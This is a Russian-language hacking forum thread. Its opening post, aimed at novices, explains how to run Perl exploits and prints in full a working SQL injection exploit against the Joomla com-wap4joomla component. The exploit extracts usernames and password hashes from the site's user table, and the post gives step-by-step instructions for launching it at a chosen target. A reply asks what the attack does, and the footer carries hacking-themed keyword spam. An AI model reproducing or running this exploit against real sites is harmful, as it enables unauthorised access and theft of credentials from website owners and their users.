Старый 09.04.2012, 14:15   #1
whitehack
RAM 32MB
 
Аватар для whitehack
 
Регистрация: 09.04.2012
Сообщений: 44
whitehack Новичок
whitehack вне форума

По умолчанию Применение эксплойтов на практике


Применение перловых эксплойтов на практике
Привет всем, Мануал расчитан на помощь нашим школьникам, студентам, скрипткидди, ламерам и чайникам... все мы начинали как никак с этих стадий развития ))

Начнем с азов и понятий:
1 - Эксплойт (фр. exploit — эксплуатировать) — это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода, который, используя возможности, предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы.
Есть так же удаленные эксплойты, тоесть те которые используются удаленным атакующим и локальные эксплойты которые выполняются локальным взломщиком...

2 - Язык Perl был создан в 1986 г. и первоначально предназначался для обработки текстов. Отсюда и его название - Practical Extraction and Report Language (язык извлечения и составления отчетов), хотя иногда его называют Pathologically Eclectic Rubbish Lister (патологически эклектичный мусорный листер). Не стоит спорить о том, какое из этих названий более правильное, потому что оба они принадлежат Ларри Воллу (Larry Wall), создателю и главному архитектору, распространителю и опекуну языка Perl.
С основой мы разобрались )) ну а теперь ближе к телу...

Нам понадобится:
1 - Интепретатор perl для комплимирования эксплойтов скачать можно
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
2 - notepad (блокнот) думаю все знают как его найти ))

3 - код эксплойта (можно достать на [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] или xakep.ru)
он должен начинатся
Код:
#!/usr/bin/perl
Итак я буду приводить пример на распространенной уязвимости вапа джумлы - joomla com-wap4joomla

КОД ЭКСПЛОЙТА
Код:
#!/usr/bin/perl -w
print
"\t\t
 ################################################################
 ############ This exploit created by ImpLex ICQ: 444-979 #######
 ############             from WHACK.RU                   #######
 ############               WHACK.RU                      #######
 ############ wapmain.php remote sql injection exploit    #######
 ############              LETS GO!!!!                    #######
 ################################################################\n\n";
# joomla com-wap4joomla
use LWP::UserAgent;
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
        chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
        chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
        chomp(my $table1=<STDIN>);


print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
                print "\n[+] User;password : $1";
                print "\n[+] password = md5(md5:salt) or md5";
                print "\n[+] target has been hacked";
                print "\n[+] If password-md5(md5:salt) => Then user - admin";
                print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
Автор ImpLex
1. устанавливаем PERL. - думаю с этим проблемы небудет
2. копируем код эксплойта в блокнот и сохраняем как *.pl
3.Помещаем получившийся файл в корень диска С:\
4.запускаем командную строку (пуск -> выполнить -> cmd)
5.запускаем в командной строке интерпритатор perl командой perl\bin\perl.exe и пишем название нашего exploit'а
6.далее вбиваем в опциях команды для данного exploit'a
и жмем enter.
Атака пошла...
  Ответить с цитированием
Ответ: Применение эксплойтов на практике
Старый 27.09.2012, 08:04   #2
DjNeon
RAM 8MB
 
Аватар для DjNeon
 
Регистрация: 29.04.2012
Сообщений: 12
DjNeon Новичок
DjNeon вне форума
По умолчанию Ответ: Применение эксплойтов на практике

я чайник. что значит атака пошла? что он делает?
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot